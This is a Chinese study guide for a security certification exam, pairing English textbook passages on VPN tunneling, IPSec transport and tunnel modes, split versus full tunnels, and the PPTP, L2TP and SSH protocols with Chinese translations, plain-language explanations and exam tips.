加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 35 / PDF P872

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

network) to its intended recipient. You can use tunneling in many situations, such as when you're bypassing firewalls, gateways, proxies, or other traffic control devices. The bypass is achieved by encapsulating the restricted content inside packets that are authorized for transmission. The tunneling process prevents the traffic control devices from blocking or dropping the communication because such devices don't know what the packets actually contain. Tunneling is often used to enable communications between otherwise disconnected systems.

If two systems are separated by a lack of network connectivity, a communication link can be established by a modem dial-up link or other remote access or wide area network (WAN) networking service. The actual LAN traffic is encapsulated in whatever communication protocol is used by the temporary connection, such as Point-to-Point Protocol in the case of modem dial-up. If two networks are connected by a network employing a different protocol, the protocol of the separated networks can often be encapsulated within the intermediary network's protocol to provide a communication pathway.

Regardless of the actual situation, tunneling protects the contents of the inner protocol and traffic packets by encasing, or wrapping, it in an authorized protocol used by the intermediary network or connection. Tunneling can be used if the primary protocol is not routable and to keep the total number of protocols supported on the network to a minimum. If the act of encapsulating a protocol involves encryption, tunneling can provide a means to transport sensitive data across untrusted intermediary networks without fear of losing confidentiality and integrity. Tunneling is not without its problems.

It is generally an inefficient means of communicating because most protocols include their own error detection, error handling, acknowledgment, and session management features, so using more than one protocol at a time compounds the overhead required to communicate a single message. Furthermore, tunneling creates either larger packets or additional packets that in turn consume additional network bandwidth. Tunneling can quickly saturate a network if sufficient bandwidth is not available. In addition, tunneling is a point-to-point communication mechanism and is not designed to handle broadcast traffic.

Tunneling also makes it difficult, if not impossible, to monitor the contents of the traffic in some circumstances, creating issues for security practitioners. When firewalls, intrusion detection systems, malware scanners, or other

中文直译 / 整理

网络)到达其预期收件人。 您可以在许多情况下使用隧道技术,例如绕过防火 墙、网关、代理或其他流量控制设备。 这种绕过是通过将受限制的内容封装在 允许传输的数据包中实现的。 隧道过程可防止流量控制设备阻止或丢弃通信, 因为这些设备并不知道数据包实际包含的内容。 隧道技术通常用于在原本无法连接的系统之间实现通信。 如果两个系统因缺乏 网络连接而隔离,可以通过调制解调器拨号连接或其他远程访问或广域网( WAN)网络服务建立通信链路。 实际的局域网流量会被封装在临时连接所使用 的通信协议中,例如调制解调器拨号情况下的点对点协议(Point‑to‑Point Protocol)。 如果两个网络通过采用不同协议的网络连接,通常可以将被隔离 网络的协议封装在中介网络的协议中,从而提供通信路径。 无论实际情况如何,隧道技术通过将内层协议和数据包封装在中介网络或连接 所使用的授权协议中,保护其内容。 当主协议不可路由时,或为了将网络支持 的协议总数降至最低,可以使用隧道技术。 如果封装协议的过程涉及加密,隧道技术便可提供一种在不可信的中介网 络上传输敏感数据的方法,而无需担心机密性和完整性丢失。 隧道传输并非没有问题。

它通常是一种低效的通信方式,因为大多数协议都包 含自己的错误检测、错误处理、确认和会话管理功能,因此同时使用多个协议 会增加传输单条消息所需的开销。 此外,隧道传输会产生更大的数据包或额外 的数据包,从而消耗更多的网络带宽。 如果可用带宽不足,隧道传输会迅速耗 尽网络带宽。 另外,隧道传输是一种点对点通信机制,不适用于处理广播流量。 隧道技术在某些情况下也使得监控流量内容变得困难,甚至不可能,从而给安全从业者带来问题。 当使用包过滤和包监控 安全机制时,您必须意识到VPN流量的数据负载将不可查看、不可访问、不可扫描或不可过滤,因为其已被加密。 因此, 为了使这些安全机制能够应对通过VPN传输的数据,它们必须部署在VPN隧道之外,在数据解密并恢复为正常局域网流量 后对其进行处理。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 36 / PDF P873

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

packet-filtering and packet-monitoring security mechanisms are used, you must realize that the data payload of VPN traffic won't be viewable, accessible, scannable, or filterable, because it's encrypted. Thus, for these security mechanisms to function against VPN-transported data, they must be placed outside of the VPN tunnel to act on the data after it has been decrypted and returned to normal LAN traffic. How VPNs Work A VPN link can be established over any other network communication connection.

Examples include a typical LAN cable connection, a wireless LAN connection, a remote access dial-up connection, a WAN link, or even a client using an Internet connection for access to an office LAN. A VPN link acts just like a typical direct LAN cable connection; the only possible difference would be speed based on the intermediary network and on the connection types between the client system and the server system. Over a VPN link, a client can perform the same activities and access the same resources as if they were directly connected via a LAN cable. This remote access method is known as remote node operation. VPNs can connect two individual systems or two entire networks.

The only difference is that the transmitted data is protected only while it is within the VPN tunnel. Remote access servers or firewalls on the network's border act as the start points and endpoints for VPNs. Thus, traffic is unprotected within the source LAN, protected between the border VPN servers, and then unprotected again once it reaches the destination LAN. VPN links through the Internet for connecting to distant networks are often inexpensive alternatives to direct links or leased lines. The cost of two highspeed Internet links to local ISPs to support a VPN is often significantly less than the cost of any other connection means available.

VPNs can operate in two modes: transport mode and tunnel mode. Transport mode links or VPNs are anchored or end at the individual hosts connected together. Let's use IPSec as an example (more on IPSec later in this chapter). In transport mode, IPSec provides encryption protection for just the payload and leaves the original message header intact (see Figure 12.1). This type of VPN is also known as a host-to-host VPN or an end-to-end encrypted VPN, since the communication remains encrypted while it is in transit between the connected hosts. Since transport mode VPNs do not encrypt a communication's header, this mode is best used only within a

中文直译 / 整理

包过滤和包监控安全机制是用于保护网络的,但您必须意识到,VPN流量的数 据负载将不可查看、不可访问、不可扫描或不可过滤,因为其已被加密。 因此, 为了使这些安全机制能够应对通过VPN传输的数据,它们必须部署在VPN隧道 之外,在数据解密并恢复为正常局域网流量后对其进行处理。 VPN的工作原理 VPN连接可以通过任何其他网络通信连接建立。 示例包括典型的局域网电缆连 接、无线局域网连接、远程拨号连接、广域网连接,甚至客户端使用互联网连 接访问办公室局域网。 VPN连接的作用与典型的直接局域网电缆连接完全相同; 唯一的可能差异是速度,这取决于中间网络以及客户端系统与服务器系统之间 的连接类型。 通过VPN连接,客户端可以执行与通过局域网电缆直接连接时相 同的活动,并访问相同的资源。 这种远程访问方法称为远程节点操作。 VPN可以连接两个独立的系统或两个完整的网络。 唯一的区别是,传输的数据 仅在VPN隧道内受到保护。 网络边界上的远程访问服务器或防火墙充当VPN的 起点和终点。 因此,流量在源局域网内未受保护,在边界VPN服务器之间受到 保护,一旦到达目标局域网后又变为未受保护状态。

通过互联网连接远程网络的VPN链接通常是直接连接或租用线路的经济替代 方案。 支持VPN的两条高速互联网链接至本地ISP的成本通常远低于任何其他 可用连接方式的成本。 VPN可以以两种模式运行:传输模式和隧道模式。 传输模式链接或VPN在相互连接的各个主机上锚定或终止。 让我们以 IPSec为例(本章后续将详细介绍IPSec)。 在传输模式下,IPSec仅对负载提 供加密保护,而保留原始消息头不变(见图12.1)。 这种类型的VPN也称为主 机到主机VPN或端到端加密VPN,因为通信在连接的主机之间传输时始终保持 加密状态。 由于传输模式VPN不加密通信的头部,因此这种模式仅适用于

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

防火墙:防火墙根据规则控制网络流量进出。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 37 / PDF P874

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

trusted network between individual systems. When needing to cross untrusted networks or link to and/or from multiple systems, then tunnel mode should be used. FIGURE 12.1 IPSec's encryption of a packet in transport mode Tunnel mode links or VPNs terminate (i.e., are anchored or end) at VPN devices on the boundaries of the connected networks (or one remote device). In tunnel mode, IPSec provides encryption protection for both the payload and message header by encapsulating the entire original LAN protocol packet and adding its own temporary IPSec header (see Figure 12.2).

FIGURE 12.2 IPSec's encryption of a packet in tunnel mode Numerous scenarios lend themselves to the deployment of tunnel mode VPNs; for example, VPNs can be used to connect two networks across the Internet (see Figure 12.3) (aka site-to-site VPN) or to allow distant clients to connect to an office local area network (LAN) across the Internet (see Figure 12.4) (aka remote access VPN). Once a VPN link is established, the network

中文直译 / 整理

个体系统之间的可信网络。 当需要跨越不可信网络或连接多个系统时,应 使用隧道模式。 图 12.1传输模式下IPSec对数据包的加密 隧道模式的链路或VPN在连接网络的边界(或一个远程设备)上的VPN设备处 终止(即锚定或结束)。 在隧道模式下,IPSec通过封装整个原始LAN协议数 据包并添加其自己的临时IPSec头部,为负载和消息头部提供加密保护(见图 12.2)。 图 12.2隧道模式下IPSec对数据包的加密 许多场景都适合部署隧道模式VPN; 例如,VPN可用于通过互联网连接两个 网络(见图12.3)(即站点到站点VPN),或允许远程客户端通过互联网连接 到办公室局域网(LAN)(见图12.4)(即远程访问VPN)。 一旦建立VPN 连接,网络

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 38 / PDF P875

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

connectivity for the VPN client is the same as a local LAN connection. A remote access VPN is a variant of the site-to-site VPN. This type of VPN is also known as a link encryption VPN, since encryption is only provided when the communication is in the VPN link or portion of the communication. There may be network segments before and after the VPN, which are not secured by the VPN. FIGURE 12.3 Two LANs being connected using a tunnel-mode VPN across the Internet A wide area network (WAN) is a network over a long distance. A metropolitan area network (MAN) is a network within a town or city. A campus area network (CAN) is a network within a college campus or a business park.

A VPN can be used over any type of network.

中文直译 / 整理

客户端的VPN连接性与本地局域网连接相同。 远程访问VPN是站点到站点 VPN的一种变体。 这种类型的VPN也被称为链路加密VPN,因为加密仅在通信 处于VPN链路或通信的VPN部分时提供。 在VPN之前和之后可能存在未受 VPN保护的网络段。 图 12.3 通过互联网使用隧道模式 VPN 连接两个局域网 一个 广域网(WAN) 是跨越长距离的网络。 一个 城域网(MAN) 是位于城镇或城市内的网络。 一个 校园网(CAN) 是位于大学校园或商业 园区内的网络。 VPN 可以在任何类型的网络上使用。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 39 / PDF P876

第 876 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 12.4 A client connecting to a network via a remote-access/tunnel VPN across the Internet Always-On An always-on VPN is one that attempts to auto-connect to the VPN service every time a network link becomes active. Always-on VPNs are mostly associated with mobile devices. Some always-on VPNs can be configured to engage only when an Internet link is established rather than a local network link or only when a Wi-Fi link is established rather than a wired link. Due to the risks of using an open public Internet link, whether wireless or wired, having an always-on VPN will ensure that a secure connection is established every time when attempting to use online resources. Split Tunnel vs.

Full Tunnel A split tunnel is a VPN configuration that allows a VPN-connected client system (i.e., remote node) to access both the organizational network over the VPN and the Internet directly at the same time. The split tunnel thus simultaneously grants an open connection to the Internet and to the organizational network. This is usually considered a security risk for the organizational network since, when a split-tunnel VPN is established, an open pathway exists from the Internet through the client to the LAN. With a VPN connection to the LAN, the client is considered trusted, so filtering is not often used. Clients don't usually have the best filtering services themselves.

So, this split tunnel pathway is an easier means for transference of malicious code, initiating intrusions, or exfiltrating confidential data than the direct LAN-to-Internet link, which is filtered by a firewall.

中文直译 / 整理

图 12.4 客户端通过互联网上的远程访问/隧道 VPN 连接到网络 Alw ays‑On 一个 始终在线的VPN 是指每当网络连接激活时,都会尝试自动连接到 VPN 服务。 始终在线的 VPN 主要与移动设备相关。 一些始终在线的 VPN 可以配 置为仅在建立互联网连接时才启用,而不是在建立本地网络连接时; 或仅在建 立 Wi‑Fi 连接时才启用,而不是在建立有线连接时。 由于使用开放的公共互 联网连接(无论无线还是有线)存在风险,启用始终在线的 VPN 可确保在尝 试使用在线资源时每次都建立安全连接。 分割隧道与全隧道 一个 分割隧道 是一种 VPN 配置,它允许已连接 VPN 的客户端系统(即远程 节点)同时通过 VPN 访问组织网络,并直接访问互联网。 因此,分割隧道同时 提供了对互联网和组织网络的开放连接。 这通常被认为是组织网络的安全风险, 因为当建立分割隧道 VPN 时,会从互联网通过客户端到局域网形成一条开放路 径。 由于通过 VPN 连接到局域网的客户端被视为可信,因此通常不使用过滤措 施。 客户端自身通常不具备最佳的过滤服务。

因此,与由防火墙过滤的直接局 域网到互联网链路相比,这种分割隧道路径更容易传输恶意代码、发起入侵或 窃取机密数据。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

防火墙:防火墙根据规则控制网络流量进出。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 876 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 40 / PDF P877

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

A full tunnel is a VPN configuration in which all of the client's traffic is sent to the organizational network over the VPN link, and then any Internetdestined traffic is routed out of the organizational network's proxy or firewall interface to the Internet. A full tunnel ensures that all traffic is filtered and managed by the organizational network's security infrastructure. Common VPN Protocols VPNs can be implemented using software or hardware solutions. In either case, there are several common VPN protocols: PPTP, L2TP, SSH, OpenVPN (i.e., TLS), and IPSec.

Point-to-Point Tunneling Protocol Point-to-Point Tunneling Protocol (PPTP) is an obsolete encapsulation protocol developed from the dial-up Point-to-Point Protocol. It operates at the Data Link Layer (Layer 2) of the OSI model and is used on IP networks. PPTP uses TCP port 1723. PPTP offers protection for authentication traffic through the same authentication protocols supported by PPP: Password Authentication Protocol (PAP) Challenge Handshake Authentication Protocol (CHAP) Extensible Authentication Protocol (EAP) Microsoft Challenge Handshake Authentication Protocol (MS-CHAPv2) The initial tunnel negotiation process used by PPTP is not encrypted.

Thus, the session establishment packets that include the IP address of the sender and receiver—and can include usernames and hashed passwords—could be intercepted by a third party. Most modern uses of PPTP have adopted the Microsoft customized implementation (MS-CHAPv2), which supports session encryption using Microsoft Point-to-Point Encryption (MPPE) and supports various secure authentication options. Although PPTP is obsolete, many OSs and VPN services still support it. Layer 2 Tunneling Protocol (L2TP) Layer 2 Tunneling Protocol (L2TP) was developed by combining features of PPTP and Cisco's Layer 2 Forwarding (L2F) VPN protocol.

Since its development, L2TP has become an Internet standard (RFC 2661). Obviously,

中文直译 / 整理

一个 全隧道 是一种 VPN 配置,其中客户端的所有流量都通过 VPN 链路发送 到组织网络,然后所有旨在访问互联网的流量通过组织网络的代理或防火墙接 口路由到互联网。 全隧道确保所有流量都经过组织网络的安全基础设施进行过 滤和管理。 常见VPN协议 VPN可以通过软件或硬件解决方案实现。 无论哪种情况,都有几种常见的 VPN协议:PPTP、L2TP、SSH、OpenVPN(即TLS)和IPSec。 点对点隧道协议 点对点隧道协议(PPTP)是一种由拨号点对点协议发展而来的过时封装协议。 它在OSI模型的数据链路层(第2层)运行,并用于IP网络。 PPTP使用TCP端 口1723。 PPTP通过PPP支持的相同身份验证协议为身份验证流量提供保护: 密码身份验证协议(PAP) 挑战握手身份验证协议(CHAP) 可扩展认证协议 (EAP) 微软挑战握手认证协议 (MS‑CHAPv2) PPTP 使用的初始隧道协商过程未加密。 因此,包含发送方和接收方 IP 地址的 会话建立数据包——可能还包括用户名和哈希密码——可能被第三方截获。

目前 大多数 PPTP 的现代应用都采用了微软定制的实现(MS‑CHAPv2),它支持 使用微软点对点加密(MPPE)进行会话加密,并支持多种安全认证选项。 尽 管 PPTP 已过时,但许多操作系统和 VPN 服务仍支持它。 第二层隧道协议 (L2TP) 第二层隧道协议(L2TP)是通过结合PPTP和思科的第二层转发(L2F)VPN协议 的功能开发的。 自开发以来,L2TP已成为互联网标准(RFC 2661)。 显然,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 41 / PDF P878

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

L2TP operates at Layer 2 and thus can support just about any Layer 3 networking protocol. L2TP uses UDP port 1701. L2TP can rely on PPP's supported authentication protocols, specifically IEEE 802.1X, which is a derivative of EAP from PPP. IEEE 802.1X enables L2TP to leverage or borrow authentication services from any available AAA server on the network, such as RADIUS or TACACS+. L2TP does not offer native encryption, but it supports the use of payload encryption protocols. Although it isn't required, L2TP is most often deployed using IPSec's ESP for payload encryption. Generic Routing Encapsulation (GRE) is also a proprietary Cisco tunneling protocol that can be used to establish VPNs.

GRE provides encapsulation but not encryption. SSH Secure Shell (SSH) is a secure replacement for Telnet (TCP port 23) and many of the Unix “r” tools, such as rlogin, rsh, rexec, and rcp. While Telnet provides plaintext remote access to a system, all SSH transmissions (both authentication and data exchange) are encrypted. SSH operates over TCP port 22. SSH is frequently used with a terminal emulator program such as Minicom or PuTTY. An example of SSH use would involve remotely connecting to a web server, firewall, switch, or router in order to make configuration changes. SSH is a very flexible tool.

It can be used as a secure Telnet replacement; it can be used to encrypt protocols (such as SFTP, SEXEC, SLOGIN, and SCP) similar to how TLS operates; and it can be used as a VPN protocol. However, as a VPN, SSH is limited to transport mode (i.e., end-to-end encryption between individual hosts, aka link encryption and host-to-host VPN). The tool OpenSSH is a means to implement SSH VPNs. L2TP

中文直译 / 整理

在第二层运行,因此可以支持几乎任何第三层网络协议。 L2TP使用 UDP端口1701。 L2TP可以依赖PPP支持的认证协议,特别是IEEE 802.1X,它是PPP中EAP的 衍生协议。 IEEE 802.1X使L2TP能够利用或借用网络上任何可用的AAA服务 器(如RADIUS或TACACS+)提供的认证服务。 L2TP本身不提供原生加密, 但支持使用负载加密协议。 尽管并非必需,L2TP通常与IPSec的ESP结合使用 以实现负载加密。 通用路由封装(GRE)也是一种专有的Cisco隧道协议,可用于建 立VPN。 GRE提供封装,但不提供加密。 SSH 安全外壳(SSH)是Telnet(TCP端口23)以及许多Unix“r”工具(如 rlogin、rsh、rexec和rcp)的安全替代方案。 Telnet提供明文远程访问系统, 而所有SSH传输(包括认证和数据交换)均经过加密。 SSH通过TCP端口22运 行。 SSH常与终端模拟程序(如Minicom或PuTTY)配合使用。 SSH的使用示 例包括远程连接到Web服务器、防火墙、交换机或路由器以进行配置更改。 SSH 是一种非常灵活的工具。

它可以作为安全的 Telnet 替代方案; 可以像 TLS 那样用于加密协议(如 SFTP、SEXE、SLOGIN 和 SCP); 也可以用作 VPN 协议。 然而,作为 VPN 时,SSH 仅限于传输模式(即在单个主机之间提 供端到端加密,又称链路加密和主机到主机 VPN)。 OpenSSH 是实现 SSH VPN 的一种工具。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P879

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

